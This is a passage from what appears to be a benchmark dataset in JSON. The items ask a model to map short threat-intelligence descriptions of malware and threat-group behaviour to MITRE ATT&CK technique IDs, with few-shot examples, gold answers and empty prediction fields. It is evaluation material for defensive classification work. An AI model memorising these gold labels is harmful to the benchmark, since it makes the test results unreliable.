T1566: Phishing\n- Text: One of the documents is called \u201c\u0647\u0645\u0628\u0633\u062a\u06af\u06cc \u0639\u0627\u0634\u0642\u0627\u0646\u0647 \u0628\u0627 \u0639\u0627\u0634\u0642\u0627\u0646 \u0622\u0632\u0627\u062f\u06cc2.doc\u201d (translates from Persian as \u201cRomantic Solidarity With Lovers of Freedom2.doc\u201d) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content\n\t - T1204.002: User Execution - Malicious File\n- Text: Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "BADFLICK has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.\n\t - T1568: Dynamic Resolution\n- Text: P2P ZeuS added junk data to outgoing UDP packets to peer implants.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: There are 2 ways by which Linux/Ebury can choose a server where the DNS packets are sent. The second method uses an algorithm to generate a domain name dynamically. This domain name will be queried for its A and TXT records. The TXT record will be used to verify that it is under the control of the operators using public key cryptography. Details about the domain generation algorithm and the verification processed will be published later\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", + "input": "Maze has forged POST strings with a random choice from a list of possibilities including \"forum\", \"php\", \"view\", etc. while making connection with the C2, hindering detection efforts.", + "gold": "- T1568: Dynamic Resolution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Newer variants of will encode C2 communications with a custom system.\n\t - T1001: Data Obfuscation\n- Text: Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "FlawedAmmyy has used HTTP for C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1105: Ingress Tool Transfer\n- Text: malware can use a SOAP Web service to communicate with its C2 server.\n\t - T1102: Web Service\n- Text: We analyzed a new RATANKBA variant that uses a PowerShell script instead of its more traditional PE executable form\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "SoreFang can download additional payloads from C2.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 3 \u2013 A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable \u2013 functionality typical for such destructive trojans \u2013 the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems\n\t - T1083: File and Directory Discovery\n- Text: Milan has run `C:\\Windows\\system32\\cmd.exe /c cmd /c dir c:\\users\\ /s 2>&1` to discover local accounts.\n\t - T1087.001: Account Discovery - Local Account\n- Text: MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.\n\t - T1518: Software Discovery\n", + "input": "Bisonal can retrieve a file listing from the system.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pony has delayed execution using a built-in function to avoid detection and analysis.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: \u201cdesktop.ini\u201d is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes.\n\t - T1622: Debugger Evasion\n- Text: CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.\n\t - T1106: Native API\n", + "input": "GuLoader has the ability to perform anti-debugging based on time checks, API calls, and CPUID.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Volgmer can gather the IP address from the victim's machine.\n\t - T1016: System Network Configuration Discovery\n- Text: HyperStack can connect to the IPC$ share on remote machines.\n\t - T1559: Inter-Process Communication\n- Text: can use the Windows API function CreateProcess to execute another process.\n\t - T1106: Native API\n", + "input": "Cyclops Blink can use the Linux API `if_nameindex` to gather network interface names.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects the account name of the logged-in user and sends it to the C2.\n\t - T1033: System Owner/User Discovery\n- Text: LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.\n\t - T1589.001: Gather Victim Identity Information - Credentials\n- Text: attempted to get users to launch malicious attachments delivered via spearphishing emails.\n\t - T1204: User Execution\n", + "input": "ZxShell can collect the owner and organization information from the target workstation.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carbon creates several tasks for later execution to continue persistence on the victim\u2019s machine.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Shamoon creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Ramsay can use the Windows COM API to schedule tasks and maintain persistence.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n", + "input": "Wizard Spider has used scheduled tasks establish persistence for TrickBot and other malware.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a tool that can detect the existence of remote systems.\n\t - T1018: Remote System Discovery\n- Text: InvisiMole has a command to list account information on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command \u201cnet use\n\t - T1049: System Network Connections Discovery\n", + "input": "Carbon uses the \"net group\" command.", + "gold": "- T1069: Permission Groups Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a tool that can detect the existence of remote systems.\n\t - T1018: Remote System Discovery\n- Text: Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.\n\t - T1135: Network Share Discovery\n", + "input": "Deep Panda has used ping to identify other machines of interest.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Explosive has collected the computer name from the infected host.\n\t - T1082: System Information Discovery\n- Text: collects data from the local victim system.\n\t - T1005: Data from Local System\n- Text: contains a keylogger module.\n\t - T1056: Input Capture\n", + "input": "PingPull can retrieve the hostname of a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Inception used a file listing plugin to collect information about file and directories both on local and remote drives.\n\t - T1083: File and Directory Discovery\n- Text: Kazuar uploads files from a specified directory to the C2 server.\n\t - T1005: Data from Local System\n- Text: Pupy can interact with a victim\u2019s Outlook session and look through folders and emails.\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "Bankshot searches for files on the victim's machine.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: decrypts and extracts a copy of its main DLL payload when executing.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Then extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: Filename qrat.exe File Size 1093120 bytes MD5 c05e5131b196f43e1d02ca5ccc48ec0e SHA1 f28c592833f234c619917b5c7d8974840a810247 Notes Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll\n\t - T1036: Masquerading\n", + "input": "UNC2452 used 7-Zip to decode its Raindrop malware.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Persistence with BITS UBoatRAT achieves persistence by using Microsoft Windows Background Intelligent Transfer Service(BITS). BITS is a service for transferring files between machines. Though the most famous application using the service is Windows Update, other applications or users can take advantage of the component. The tool provides the option, /SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot. After completing the copying the local file, BITS executes the UBoatRAT file configured with /SetNotifyCmdLine at the third line\n\t - T1197: BITS Jobs\n- Text: Cobalt Strike can use \"sudo\" to run a command.\n\t - T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching\n- Text: APT29 used \"AUDITPOL\" to prevent the collection of audit logs.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n", + "input": "APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.", + "gold": "- T1562.003: Impair Defenses - Impair Command History Logging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has used large file sizes to avoid detection.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: FIN13 rolled many of these reconnaissance efforts into scripts to automate their processes. For example, they used pi.bat to iterate through a list of IP addresses in a file, execute a ping command and write the output to a file (Figure 6). A similar script used dnscmd to export a host\u2019s DNS zones to a file.\n\t - T1595.001: Active Scanning - Scanning IP Blocks\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.\n\t - T1027: Obfuscated Files or Information\n", + "input": "POWERSTATS has used useless code blocks to counter analysis.", + "gold": "- T1027.001: Obfuscated Files or Information - Binary Padding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain\n\t - T1041: Exfiltration Over C2 Channel\n- Text: TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.\n\t - T1571: Non-Standard Port\n- Text: On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains\n\t - T1090.002: Proxy - External Proxy\n\t - T1095: Non-Application Layer Protocol\n", + "input": "GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.\n\t - T1033: System Owner/User Discovery\n- Text: APT1 used the commands \"net localgroup\",\"net user\", and \"net group\" to find accounts on the system.\n\t - T1087.001: Account Discovery - Local Account\n- Text: (Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit\n\t - T1016: System Network Configuration Discovery\n", + "input": "Denis enumerates and collects the username from the victim\u2019s machine.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuasarRAT can use TCP for C2 communication.\n\t - T1095: Non-Application Layer Protocol\n- Text: GeminiDuke uses HTTP and HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The first backdoor that the TeleBots group relied heavily on was Python/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "PHOREAL communicates via ICMP for C2.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KEYS Deletes the file named by tempPath + \u201cky\u201d file so as not to upload anything\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Read a specified file\u2019s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot Marking a file for deletion on reboot\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1041: Exfiltration Over C2 Channel\n- Text: njRAT is capable of manipulating and deleting registry keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "StrongPity can delete previously exfiltrated files from the compromised host.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: compressed data with zlib prior to sending it over C2.\n\t - T1560: Archive Collected Data\n- Text: APT41 created a RAR archive of targeted files for exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Epic compresses the collected data with bzip2 before sending it to the C2 server.\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "The Ke3chang group has been known to compress data before exfiltration.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attack overview . Flagpro is used in the initial stage of attacks to investigate target\u2019s environment, download a second stage malware and execute it. Flagpro communicates with a C&C server, and it receives commands to execute from the server, or Flagpro downloads a second stage malware and then executes it. Therefore, Flagpro may have already been used for attacking cases at that point. We call this sample using MFC as \u201cFlagpro v2.0\u201d and old one as \u201cFlagpro v1.0\u201d in this article. Once Flagpro is launched, it communicate with a C&C server and executes the received commands as shown in the above list. If it is not included in both Download Command fields in the command, Flagpro will not execute the main processes such as downloading, executing OS commands, collecting authentication information, and so on. If a Download Command field has \u201cExecYes\u201d, Flagpro downloads and executes the file. In requesting commands, sending execution results of OS commands or collected authentication information, Flagpro accesses a C&C server with specific URL paths and queries. Following image is an example of the response: Detections . To detect attacks using Flagpro, it is effective to create and install custom signature both on network and endpoint devices. In addition, the investigation commands after Flagpro establishes the connection with the C&C server like following are also useful for detection\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: dsquery can be used to gather information on permission groups within a domain.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n", + "input": "BloodHound can collect information about local groups and members.", + "gold": "- T1069.001: Permission Groups Discovery - Local Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This decrypted data is written to the following location: %TEMP%\\WUpdate.~tmp This \u2018WUpdate.~tmp\u2019 file is then copied to a filename of \u2018Applet.cpl\u2019, which is placed in the previously identified file path\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1074: Data Staged\n- Text: These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer\n\t - T1027: Obfuscated Files or Information\n- Text: McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact\n\t - T1560: Archive Collected Data\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Remexi decrypts the configuration data using XOR with 25-character keys.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 used WMI to steal credentials and execute backdoors at a future time. They have also used WMI for the remote execution of files for lateral movement.\n\t - T1047: Windows Management Instrumentation\n- Text: POSHSPY uses a WMI event subscription to establish persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "APT34 has used WMI for execution.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: !ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server\n\t - T1057: Process Discovery\n\t - T1105: Ingress Tool Transfer\n- Text: Additionally it checks to determine if common analysis tools are currently running on the infected system\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: MirageFox can gather the username from the victim\u2019s machine.\n\t - T1033: System Owner/User Discovery\n", + "input": "APT3 has a tool that can list out currently running processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. also uses secure file deletion to delete files from the victim. Additionally, malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Misdat is capable of deleting Registry keys used for persistence.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "Elise is capable of launching a remote shell on the host to delete itself.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The source code only considers the following machine types:default: lpString = \"(Other)\"; break;case 0x02: lpString = \"(Unknown)\"; break;case 0x03: lpString = \"(Desktop)\"; break;case 0x04: lpString = \"(Low Profile Desktop)\"; break;case 0x06: lpString = \"(Mini Tower)\"; break;case 0x07: lpString = \"(Tower)\"; break;case 0x08: lpString = \"(Portable)\"; break;case 0x09: lpString = \"(Laptop)\"; break;case 0x0A: lpString = \"(Notebook)\"; break;case 0x0E: lpString = \"(Sub Notebook)\"; break;The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"Golden Time\" campaign.Brower StealerFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer\n\t - T1008: Fallback Channels\n\t - T1124: System Time Discovery\n- Text: QuasarRAT can determine the country a victim host is located in.\n\t - T1614: System Location Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, 